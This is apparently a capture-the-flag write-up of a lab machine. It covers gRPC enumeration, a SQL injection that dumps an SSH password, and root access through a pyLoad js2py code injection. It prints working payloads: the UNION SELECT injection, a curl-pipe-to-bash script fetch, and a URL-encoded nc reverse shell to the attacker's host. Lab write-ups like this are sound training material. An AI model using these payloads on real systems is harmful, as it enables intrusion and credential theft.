官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
- 关注
本文由
创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.11.214 | TCP:22,50051 |
$ ip='10.10.11.214'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 91bf44edea1e3224301f532cea71e5ef (RSA)
| 256 8486a6e204abdff71d456ccf395809de (ECDSA)
|_ 256 1aa89572515e8e3cf180f542fd0a281c (ED25519)
50051/tcp open unknown
gRPC HTTP/2 SQLI
https://github.com/fullstorydev/grpcurl/releases/latest/download/grpcurl_1.9.2_linux_x86_64.tar.gz
$ grpcurl -plaintext 10.10.11.214:50051 list
$ grpcurl -plaintext 10.10.11.214:50051 list SimpleApp
$ grpcurl -plaintext 10.10.11.214:50051 describe SimpleApp
$ grpcurl -plaintext 10.10.11.214:50051 describe LoginUserRequest
$ grpcurl -plaintext 10.10.11.214:50051 describe getInfoRequest
请求参数
注册用户
$ grpcurl -plaintext -d '{"username":"maps","password":"maps"}' 10.10.11.214:50051 SimpleApp.RegisterUser
$ grpcurl -plaintext -vv -d '{"username":"maps","password":"maps"}' 10.10.11.214:50051 SimpleApp.LoginUser
token: b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoibWFwcyIsImV4cCI6MTczOTg2MzQyOX0.CHbQPJZifCuzIQ7IzTJlN8BYd9T4SStEwEL4ygJpygM'
$ grpcurl -plaintext -H 'token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoibWFwcyIsImV4cCI6MTczOTg2MzQyOX0.CHbQPJZifCuzIQ7IzTJlN8BYd9T4SStEwEL4ygJpygM' -d '{"id": "-1 union select 2-- -"}' 10.10.11.214:50051 SimpleApp.getInfo
$ grpcurl -plaintext -H 'token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoibWFwcyIsImV4cCI6MTczOTg5NTYyNn0.ad2gHY5jP89gKHHTwRndAV_vC3nLAW48qNNGBs5SSxY' -d '{"id": "-1 UNION SELECT GROUP_CONCAT(username || password) FROM accounts;--"}' 10.10.11.214:50051 SimpleApp.getInfo
HereIsYourPassWord1431
$ ssh sau@10.10.11.214
User.txt
853046f61d1950319e09a0664f03abc6
Privilege Escalation:pyLoad 0.5.0 js2py Abuse
https://github.com/MartinxMax/KTOR/blob/main/ktor.sh
$ curl http://10.10.16.24/ktor.sh|bash -s -- -l -p all
$ ssh -f -N -L 8000:127.0.0.1:8000 -L 9666:127.0.0.1:9666 sau@10.10.11.214
http://127.0.0.1:8000/login?next=http%3A%2F%2F127.0.0.1%3A8000%2F
$ ps aux | grep pyload
https://huntr.com/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65
$ curl -i -s -k -X POST \
--data-binary "jk=pyimport%20os;os.system(\"rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.10.16.24%201234%20%3E%2Ftmp%2Ff\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa" \
"http://localhost:8000/flash/addcrypted2"
Root.txt
6c032585f46aad66f4762f8f95e59fe1
已在FreeBuf发表 0 篇文章
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
- 0 文章数
- 0 关注者